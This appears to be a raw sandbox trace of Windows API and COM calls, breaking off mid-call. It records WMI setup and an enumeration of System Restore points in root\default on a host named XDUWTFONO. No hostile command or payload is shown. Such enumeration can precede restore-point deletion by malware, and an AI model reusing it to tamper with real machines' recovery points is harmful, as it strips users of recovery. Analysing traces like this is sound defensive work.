[0119.282] GetCurrentThreadId () returned 0xb0c [0119.282] GetCurrentThreadId () returned 0xb0c [0119.282] GetCurrentThreadId () returned 0xb0c [0119.282] GetCurrentThreadId () returned 0xb0c [0119.282] ResetEvent (hEvent=0xb8) returned 1 [0119.282] GetCurrentThreadId () returned 0xb0c [0119.282] GetCurrentThreadId () returned 0xb0c [0119.282] SetEvent (hEvent=0xbc) returned 1 [0119.282] SetEvent (hEvent=0xb8) returned 1 [0119.282] CloseHandle (hObject=0x4bc) returned 1 [0119.282] IUnknown:QueryInterface (in: This=0x6022c6c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee968 | out: ppvObject=0x6ee968*=0x6022c70) returned 0x0 [0119.283] IClientSecurity:QueryBlanket (in: This=0x6022c70, pProxy=0x6022c6c, pAuthnSvc=0x6ee9b8, pAuthzSvc=0x6ee9b4, pServerPrincName=0x6ee9ac, pAuthnLevel=0x6ee9b0, pImpLevel=0x6ee9a0, pAuthInfo=0x6ee9a4, pCapabilites=0x6ee9a8 | out: pAuthnSvc=0x6ee9b8*=0xa, pAuthzSvc=0x6ee9b4*=0x0, pServerPrincName=0x6ee9ac, pAuthnLevel=0x6ee9b0*=0x6, pImpLevel=0x6ee9a0*=0x2, pAuthInfo=0x6ee9a4, pCapabilites=0x6ee9a8*=0x1) returned 0x0 [0119.283] IUnknown:Release (This=0x6022c70) returned 0x1 [0119.283] IUnknown:QueryInterface (in: This=0x6022c6c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee95c | out: ppvObject=0x6ee95c*=0xb5a8e4) returned 0x0 [0119.283] IUnknown:QueryInterface (in: This=0x6022c6c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee958 | out: ppvObject=0x6ee958*=0x6022c70) returned 0x0 [0119.283] IClientSecurity:SetBlanket (This=0x6022c70, pProxy=0x6022c6c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0119.286] GetCurrentThreadId () returned 0xb0c [0119.286] ResetEvent (hEvent=0xb8) returned 1 [0119.286] GetCurrentThreadId () returned 0xb0c [0119.286] GetCurrentThreadId () returned 0xb0c [0119.286] GetCurrentThreadId () returned 0xb0c [0119.286] GetCurrentThreadId () returned 0xb0c [0119.286] ResetEvent (hEvent=0xb8) returned 1 [0119.286] GetCurrentThreadId () returned 0xb0c [0119.286] GetCurrentThreadId () returned 0xb0c [0119.286] SetEvent (hEvent=0xbc) returned 1 [0119.286] SetEvent (hEvent=0xb8) returned 1 [0119.286] CloseHandle (hObject=0x4bc) returned 1 [0119.288] GetCurrentThreadId () returned 0xb0c [0119.288] ResetEvent (hEvent=0xb8) returned 1 [0119.288] GetCurrentThreadId () returned 0xb0c [0119.288] GetCurrentThreadId () returned 0xb0c [0119.288] GetCurrentThreadId () returned 0xb0c [0119.288] GetCurrentThreadId () returned 0xb0c [0119.288] ResetEvent (hEvent=0xb8) returned 1 [0119.288] GetCurrentThreadId () returned 0xb0c [0119.288] GetCurrentThreadId () returned 0xb0c [0119.288] SetEvent (hEvent=0xbc) returned 1 [0119.288] SetEvent (hEvent=0xb8) returned 1 [0119.288] CloseHandle (hObject=0x4bc) returned 1 [0119.289] IUnknown:Release (This=0x6022c70) returned 0x2 [0119.289] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x1 [0119.289] CoTaskMemFree (pv=0xbd4858) [0119.289] IUnknown:QueryInterface (in: This=0x6022c6c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee550 | out: ppvObject=0x6ee550*=0xb5a8e4) returned 0x0 [0119.289] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee50c | out: ppvObject=0x6ee50c*=0x0) returned 0x80004002 [0119.289] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee32c | out: ppvObject=0x6ee32c*=0x0) returned 0x80004002 [0119.290] WbemLocator:IUnknown:AddRef (This=0xb5a8e4) returned 0x3 [0119.290] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6ede6c | out: ppvObject=0x6ede6c*=0x0) returned 0x80004002 [0119.290] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6ede1c | out: ppvObject=0x6ede1c*=0x0) returned 0x80004002 [0119.290] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ede28 | out: ppvObject=0x6ede28*=0xb5a844) returned 0x0 [0119.290] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a844, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6ede30 | out: pCid=0x6ede30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.290] WbemLocator:IUnknown:Release (This=0xb5a844) returned 0x3 [0119.290] CoGetContextToken (in: pToken=0x6ede88 | out: pToken=0x6ede88) returned 0x0 [0119.290] CoGetContextToken (in: pToken=0x6ee290 | out: pToken=0x6ee290) returned 0x0 [0119.290] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee320 | out: ppvObject=0x6ee320*=0xb5a8cc) returned 0x0 [0119.290] WbemLocator:IRpcOptions:Query (in: This=0xb5a8cc, pPrx=0xb5a8e4, dwProperty=2, pdwValue=0x6ee348 | out: pdwValue=0x6ee348) returned 0x80004002 [0119.290] WbemLocator:IUnknown:Release (This=0xb5a8cc) returned 0x3 [0119.291] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x2 [0119.291] CoGetContextToken (in: pToken=0x6ee860 | out: pToken=0x6ee860) returned 0x0 [0119.291] CoGetContextToken (in: pToken=0x6ee7c0 | out: pToken=0x6ee7c0) returned 0x0 [0119.291] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x6ee890*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x6ee88c | out: ppvObject=0x6ee88c*=0x6022c6c) returned 0x0 [0119.291] IUnknown:AddRef (This=0x6022c6c) returned 0x4 [0119.291] IUnknown:Release (This=0x6022c6c) returned 0x3 [0119.291] IUnknown:Release (This=0x6022c6c) returned 0x2 [0119.291] WbemLocator:IUnknown:Release (This=0x60210f4) returned 0x2 [0119.291] SysStringLen (param_1=0x0) returned 0x0 [0119.291] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb0c | out: puCount=0x6eeb0c*=0x2) returned 0x0 [0119.291] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb08*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb08*=0x11, pszText=0x0) returned 0x0 [0119.291] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb08*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb08*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0119.291] CoGetContextToken (in: pToken=0x6ee950 | out: pToken=0x6ee950) returned 0x0 [0119.291] IUnknown:AddRef (This=0x6022c6c) returned 0x3 [0119.291] IEnumWbemClassObject:Clone (in: This=0x6022c6c, ppEnum=0x6eeb0c | out: ppEnum=0x6eeb0c*=0x6022d34) returned 0x0 [0119.292] IUnknown:QueryInterface (in: This=0x6022d34, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee9d0 | out: ppvObject=0x6ee9d0*=0x6022d38) returned 0x0 [0119.292] IClientSecurity:QueryBlanket (in: This=0x6022d38, pProxy=0x6022d34, pAuthnSvc=0x6eea20, pAuthzSvc=0x6eea1c, pServerPrincName=0x6eea14, pAuthnLevel=0x6eea18, pImpLevel=0x6eea08, pAuthInfo=0x6eea0c, pCapabilites=0x6eea10 | out: pAuthnSvc=0x6eea20*=0xa, pAuthzSvc=0x6eea1c*=0x0, pServerPrincName=0x6eea14, pAuthnLevel=0x6eea18*=0x6, pImpLevel=0x6eea08*=0x2, pAuthInfo=0x6eea0c, pCapabilites=0x6eea10*=0x1) returned 0x0 [0119.292] IUnknown:Release (This=0x6022d38) returned 0x1 [0119.292] IUnknown:QueryInterface (in: This=0x6022d34, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee9c4 | out: ppvObject=0x6ee9c4*=0xb5ad94) returned 0x0 [0119.293] IUnknown:QueryInterface (in: This=0x6022d34, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee9c0 | out: ppvObject=0x6ee9c0*=0x6022d38) returned 0x0 [0119.293] IClientSecurity:SetBlanket (This=0x6022d38, pProxy=0x6022d34, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0119.294] IUnknown:Release (This=0x6022d38) returned 0x2 [0119.294] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x1 [0119.294] CoTaskMemFree (pv=0xbd47f8) [0119.294] IUnknown:QueryInterface (in: This=0x6022d34, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee5ac | out: ppvObject=0x6ee5ac*=0xb5ad94) returned 0x0 [0119.294] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee568 | out: ppvObject=0x6ee568*=0x0) returned 0x80004002 [0119.294] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee384 | out: ppvObject=0x6ee384*=0x0) returned 0x80004002 [0119.295] WbemLocator:IUnknown:AddRef (This=0xb5ad94) returned 0x3 [0119.295] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edec4 | out: ppvObject=0x6edec4*=0x0) returned 0x80004002 [0119.295] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6ede74 | out: ppvObject=0x6ede74*=0x0) returned 0x80004002 [0119.295] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ede80 | out: ppvObject=0x6ede80*=0xb5acf4) returned 0x0 [0119.295] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5acf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6ede88 | out: pCid=0x6ede88*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.295] WbemLocator:IUnknown:Release (This=0xb5acf4) returned 0x3 [0119.295] CoGetContextToken (in: pToken=0x6edee0 | out: pToken=0x6edee0) returned 0x0 [0119.295] CoGetContextToken (in: pToken=0x6ee2e8 | out: pToken=0x6ee2e8) returned 0x0 [0119.295] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee378 | out: ppvObject=0x6ee378*=0xb5ad7c) returned 0x0 [0119.295] WbemLocator:IRpcOptions:Query (in: This=0xb5ad7c, pPrx=0xb5ad94, dwProperty=2, pdwValue=0x6ee3a0 | out: pdwValue=0x6ee3a0) returned 0x80004002 [0119.295] WbemLocator:IUnknown:Release (This=0xb5ad7c) returned 0x3 [0119.295] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x2 [0119.296] CoGetContextToken (in: pToken=0x6ee8c0 | out: pToken=0x6ee8c0) returned 0x0 [0119.296] CoGetContextToken (in: pToken=0x6ee820 | out: pToken=0x6ee820) returned 0x0 [0119.296] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x6ee8f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x6ee8ec | out: ppvObject=0x6ee8ec*=0x6022d34) returned 0x0 [0119.296] IUnknown:AddRef (This=0x6022d34) returned 0x4 [0119.296] IUnknown:Release (This=0x6022d34) returned 0x3 [0119.296] IUnknown:Release (This=0x6022d34) returned 0x2 [0119.296] IUnknown:Release (This=0x6022c6c) returned 0x2 [0119.296] SysStringLen (param_1=0x0) returned 0x0 [0119.296] IEnumWbemClassObject:Reset (This=0x6022d34) returned 0x0 [0119.298] CoTaskMemAlloc (cb=0x4) returned 0xbb59b8 [0119.298] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbb59b8, puReturned=0x389bfe4 | out: apObjects=0xbb59b8*=0x6022d70, puReturned=0x389bfe4*=0x1) returned 0x0 [0121.988] IUnknown:QueryInterface (in: This=0x6022d70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6022d70) returned 0x0 [0121.989] IUnknown:QueryInterface (in: This=0x6022d70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0121.990] IUnknown:QueryInterface (in: This=0x6022d70, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0121.990] IUnknown:AddRef (This=0x6022d70) returned 0x3 [0121.990] IUnknown:QueryInterface (in: This=0x6022d70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0121.990] IUnknown:QueryInterface (in: This=0x6022d70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0121.990] IUnknown:QueryInterface (in: This=0x6022d70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6022d74) returned 0x0 [0121.991] IMarshal:GetUnmarshalClass (in: This=0x6022d74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0121.991] IUnknown:Release (This=0x6022d74) returned 0x3 [0121.991] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0121.991] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0121.991] IUnknown:QueryInterface (in: This=0x6022d70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0121.991] IUnknown:Release (This=0x6022d70) returned 0x2 [0121.991] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0121.991] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0121.991] IUnknown:QueryInterface (in: This=0x6022d70, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6022d70) returned 0x0 [0121.991] IUnknown:AddRef (This=0x6022d70) returned 0x4 [0121.991] IUnknown:Release (This=0x6022d70) returned 0x3 [0121.991] IUnknown:Release (This=0x6022d70) returned 0x2 [0121.991] CoTaskMemFree (pv=0xbb59b8) [0121.991] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0121.991] IUnknown:AddRef (This=0x6022d70) returned 0x3 [0121.992] IWbemClassObject:Get (in: This=0x6022d70, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0121.992] IWbemClassObject:Get (in: This=0x6022d70, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=3", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0121.992] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=3") returned 0x6e [0121.992] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=3") returned 0x6e [0121.992] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0121.992] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0121.992] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0121.992] IUnknown:Release (This=0xb51e34) returned 0x1 [0121.993] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6021010) returned 0x0 [0121.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021010, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0121.993] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6021010, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6022f08) returned 0x0 [0121.993] WbemDefPath:IUnknown:Release (This=0x6021010) returned 0x0 [0121.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x6022f08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6022f08) returned 0x0 [0121.993] WbemDefPath:IUnknown:QueryInterface (in: This=0x6022f08, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0121.993] WbemDefPath:IUnknown:AddRef (This=0x6022f08) returned 0x3 [0121.996] WbemDefPath:IUnknown:QueryInterface (in: This=0x6022f08, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0121.996] WbemDefPath:IUnknown:QueryInterface (in: This=0x6022f08, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0121.996] WbemDefPath:IUnknown:QueryInterface (in: This=0x6022f08, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbb59b8) returned 0x0 [0121.998] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb59b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0121.998] WbemDefPath:IUnknown:Release (This=0xbb59b8) returned 0x3 [0121.998] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0121.998] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0121.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6022f08, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0121.998] WbemDefPath:IUnknown:Release (This=0x6022f08) returned 0x2 [0121.998] WbemDefPath:IUnknown:Release (This=0x6022f08) returned 0x1 [0121.998] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0121.998] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0121.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6022f08, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, 